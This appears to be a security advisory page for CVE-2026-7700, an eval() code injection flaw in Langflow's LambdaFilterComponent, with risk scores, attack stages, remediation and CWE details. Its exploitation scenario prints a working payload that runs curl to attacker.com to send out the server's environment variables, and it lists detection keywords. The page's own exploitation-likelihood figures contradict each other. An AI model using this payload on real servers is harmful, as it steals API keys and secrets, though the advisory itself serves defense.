CVE-2026-7700: Langflow eval() code injection →

CISO Take

Langflow's LambdaFilterComponent passes user-supplied lambda expressions directly into Python's eval() without sanitization, allowing any authenticated user to execute arbitrary server-side code. The attack requires only low privileges and zero user interaction — any Langflow account holder in a shared or multi-tenant deployment can escalate to full server compromise. A detailed technical write-up with proof-of-concept code has been publicly released, and while the absolute EPSS score is low, this CVE ranks in the top 88th percentile for exploitation likelihood. Organizations running Langflow ≤1.8.4 should upgrade immediately; if patching is not immediately possible, disable the LambdaFilterComponent, restrict instance access to verified trusted users, and rotate all LLM API keys and secrets stored in the Langflow environment.

Sources: NVD EPSS ATLAS VulnDB

What is the risk?

CVSS 6.3 (Medium) materially understates real-world risk. Eval-based code injection is a script-kiddie-accessible primitive — no AI/ML expertise required — and a public PoC with detailed analysis is already circulating. The low privilege requirement means any authenticated user, including those on shared team instances or trial accounts, can trigger RCE. For organizations using Langflow as an LLM orchestration layer, server compromise exposes the full credential store (LLM API keys, DB passwords, integration tokens), RAG knowledge bases, conversation histories, and flow configurations — blast radius well beyond a typical medium-severity CVE.

How does the attack unfold?

Initial Access

Attacker authenticates to a Langflow instance using a low-privilege account obtained via trial signup, credential stuffing, or compromised team credentials.

AML.T0049

Code Injection

Attacker adds a LambdaFilterComponent to a flow and injects malicious Python code into the lambda expression field, which will be passed unsanitized to eval().

AML.T0050

Remote Code Execution

Attacker triggers flow execution; eval() processes the payload and executes arbitrary Python with Langflow server process permissions — reverse shell or data exfiltration runs immediately.

AML.T0050

Credential Harvest & Impact

Attacker exfiltrates all LLM API keys, database credentials, and secrets from the server environment, and may establish persistence or pivot to downstream RAG stores and connected services.

AML.T0055

Initial Access

Attacker authenticates to a Langflow instance using a low-privilege account obtained via trial signup, credential stuffing, or compromised team credentials.

AML.T0049

Code Injection

Attacker adds a LambdaFilterComponent to a flow and injects malicious Python code into the lambda expression field, which will be passed unsanitized to eval().

AML.T0050

Remote Code Execution

Attacker triggers flow execution; eval() processes the payload and executes arbitrary Python with Langflow server process permissions — reverse shell or data exfiltration runs immediately.

AML.T0050

Credential Harvest & Impact

Attacker exfiltrates all LLM API keys, database credentials, and secrets from the server environment, and may establish persistence or pivot to downstream RAG stores and connected services.

AML.T0055

What systems are affected?

Package	Ecosystem	Vulnerable Range	Patched
Langflow	pip	—	No patch
149.9K Pushed 3d ago 40% patched ~67d to patch Full package profile →

Do you use Langflow? You're affected.

How severe is it?

CVSS 3.1

6.3 / 10

EPSS

0.3%

chance of exploitation in 30 days

Higher than 21% of all CVEs

Source: EPSS v3 — FIRST.org

Exploitation Status

No known exploitation

Sophistication

Trivial

What is the attack surface?

AV Network

AC Low

PR Low

UI None

S Unchanged

C Low

I Low

A Low

What should I do?

5 steps

Upgrade Langflow to 1.8.5 or later — this is the primary and preferred remediation.
If immediate upgrade is blocked: disable or remove the LambdaFilterComponent from your deployment configuration and restrict Langflow access to known, trusted internal users only (not public-facing).
Audit application logs for LambdaFilterComponent usage — flag any lambda expressions containing Python builtins like __import__, os, subprocess, socket, or exec.
Immediately rotate all LLM API keys, database credentials, and secrets stored in the Langflow server environment — assume compromise if the instance was publicly accessible.
Deploy WAF rules to block common eval injection payloads as a temporary compensating control while coordinating patching.

What does CISA's SSVC say?

Decision Track

Exploitation none

Automatable No

Technical Impact partial

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Code Execution Data Extraction Framework Agent AML.T0010.001 - AI Software AML.T0049 - Exploit Public-Facing Application AML.T0050 - Command and Scripting Interpreter AML.T0055 - Unsecured Credentials

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act

Article 15 - Accuracy, robustness and cybersecurity

ISO 42001

Clause 6.1.2 - AI risk assessment

NIST AI RMF

MANAGE 2.2 - Mechanisms are in place to address AI risks across the lifecycle

OWASP LLM Top 10

LLM06 - Excessive Agency

Frequently Asked Questions

What is CVE-2026-7700?

Langflow's LambdaFilterComponent passes user-supplied lambda expressions directly into Python's eval() without sanitization, allowing any authenticated user to execute arbitrary server-side code. The attack requires only low privileges and zero user interaction — any Langflow account holder in a shared or multi-tenant deployment can escalate to full server compromise. A detailed technical write-up with proof-of-concept code has been publicly released, and while the absolute EPSS score is low, this CVE ranks in the top 88th percentile for exploitation likelihood. Organizations running Langflow ≤1.8.4 should upgrade immediately; if patching is not immediately possible, disable the LambdaFilterComponent, restrict instance access to verified trusted users, and rotate all LLM API keys and secrets stored in the Langflow environment.

Is CVE-2026-7700 actively exploited?

No confirmed active exploitation of CVE-2026-7700 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-7700?

1. Upgrade Langflow to 1.8.5 or later — this is the primary and preferred remediation. 2. If immediate upgrade is blocked: disable or remove the LambdaFilterComponent from your deployment configuration and restrict Langflow access to known, trusted internal users only (not public-facing). 3. Audit application logs for LambdaFilterComponent usage — flag any lambda expressions containing Python builtins like __import__, os, subprocess, socket, or exec. 4. Immediately rotate all LLM API keys, database credentials, and secrets stored in the Langflow server environment — assume compromise if the instance was publicly accessible. 5. Deploy WAF rules to block common eval injection payloads as a temporary compensating control while coordinating patching.

What systems are affected by CVE-2026-7700?

This vulnerability affects the following AI/ML architecture patterns: LLM orchestration pipelines, agent frameworks, no-code/low-code AI platforms, RAG pipelines.

What is the CVSS score for CVE-2026-7700?

CVE-2026-7700 has a CVSS v3.1 base score of 6.3 (MEDIUM). The EPSS exploitation probability is 0.29%.

What is the AI security impact?

Affected AI Architectures

LLM orchestration pipelinesagent frameworksno-code/low-code AI platformsRAG pipelines

MITRE ATLAS Techniques

AML.T0010.001 AI Software

AML.T0049 Exploit Public-Facing Application

AML.T0050 Command and Scripting Interpreter

AML.T0055 Unsecured Credentials

Compliance Controls Affected

EU AI Act: Article 15

ISO 42001: Clause 6.1.2

NIST AI RMF: MANAGE 2.2

OWASP LLM Top 10: LLM06

What are the technical details?

Original Advisory

A weakness has been identified in langflow-ai langflow up to 1.8.4. This affects the function eval of the file src/lfx/src/lfx/components/llm_operations/lambda_filter.p of the component LambdaFilterComponent. Executing a manipulation can lead to code injection. The attack may be performed from remote. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.

Exploitation Scenario

An attacker with a low-privilege Langflow account — obtained via trial signup, credential stuffing, or insider access — opens the flow builder and adds a LambdaFilterComponent. In the lambda expression field they inject: `lambda x: __import__('os').popen('curl attacker.com/exfil?d=$(env | base64 -w0)').read()`. When the flow is executed, eval() processes the expression and the payload runs server-side with the Langflow process permissions. Within seconds the attacker receives all environment variables including LLM API keys, database connection strings, and Clerk/Stripe secrets. From there they establish a reverse shell for persistence, pivot to connected data stores, and exfiltrate all RAG documents and user conversation histories — all from what appeared to be a routine workflow test.

Weaknesses (CWE)

CWE-74 Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') Primary CWE-94 Improper Control of Generation of Code ('Code Injection') Primary

CWE-74 — Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection'): The product constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component.

[Requirements] Programming languages and supporting technologies might be chosen which are not subject to these issues.
[Implementation] Utilize an appropriate mix of allowlist and denylist parsing to filter control-plane syntax from all input.

Source: MITRE CWE corpus.